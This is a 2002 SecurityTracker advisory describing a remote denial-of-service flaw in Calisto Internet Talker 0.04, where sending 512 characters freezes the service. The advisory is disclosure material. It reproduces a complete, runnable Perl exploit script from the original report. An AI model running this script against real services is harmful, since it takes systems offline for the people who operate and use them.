SecurityTracker: Calisto Internet Talker Bug Lets Remote Users Crash the Service

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Calisto

Vendors: Howkins, Peter et al

Calisto Internet Talker Bug Lets Remote Users Crash the Service

SecurityTracker Alert ID: 1005700

SecurityTracker URL: http://securitytracker.com/id/1005700

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Nov 25 2002

Impact: Denial of service via network

Exploit Included: Yes

Version(s): 0.04

Description: A denial of service vulnerability was reported in the Calisto Internet talker. A remote user can cause the service to freeze.

SecurityFreaks reported that a remote user can connect to the talker service port and send 512 characters to the service to cause it to freeze. A manual restart is reportedly required.

Some demonstration exploit code is provided in the Source Message and at Packetstorm at:

http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl

Impact: A remote user can cause the service to lock up.

Solution: No solution was available at the time of this entry.

Vendor URL: www.arcsite.de/hp/flibble/calisto/ (Links to External Site)

Cause: Boundary error

Underlying OS: Linux (Any), UNIX (Any)

Message History: None.

Source Message Contents

Date: Mon, 25 Nov 2002 00:46:51 -0500
Subject: Calisto Internet Talker Version 0.04 Remote Denial of Service


http://packetstorm.decepticons.org/0211-exploits/SF-talkischeap.pl


#!/usr/bin/perl
#
# S e c u r i t y F r e a k s
#  www.securityfreaks.com
#
# Calisto Internet Talker Version 0.04 Remote Denial of Service
#
#
# This exploit will not cause Calisto to crash but rather cause it 
# to freeze until manually restarted. This actually works out better 
# because Calisto comes with an autorun script that would restart it 
# should it crash anyway.
#
# [ subversive[at]linuxmail.org ] - *31/10/2002*


use IO::Socket;


$data = "A";
$size = "512";
$freeze .= $data x $size;

while($_ = $ARGV[0], /^-/) {
    shift;       
    last if /^--$/;
    /^-h/ && do { $host = shift; };
    /^-p/ && do { $port = shift; };
}

if(!$host != 0) {

print <<"ACTIONSSPEAKLOUDERTHANWORDS";
   
   SF-talkischeap.pl by subversive - www.securityfreaks.com
   Calisto Internet Talker Version 0.04 Remote Denial of Service
  

   Usage :  $0 -h <host> -p <port>

ACTIONSSPEAKLOUDERTHANWORDS
exit;

}

my $sock = new IO::Socket::INET ( Proto    => "tcp",
                                  PeerAddr => $host,
                                  PeerPort => $port,
                                );
die "\nCould not connect to $host : $!\n" unless $sock;

print $sock "$freeze";
close($sock);
exit;

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC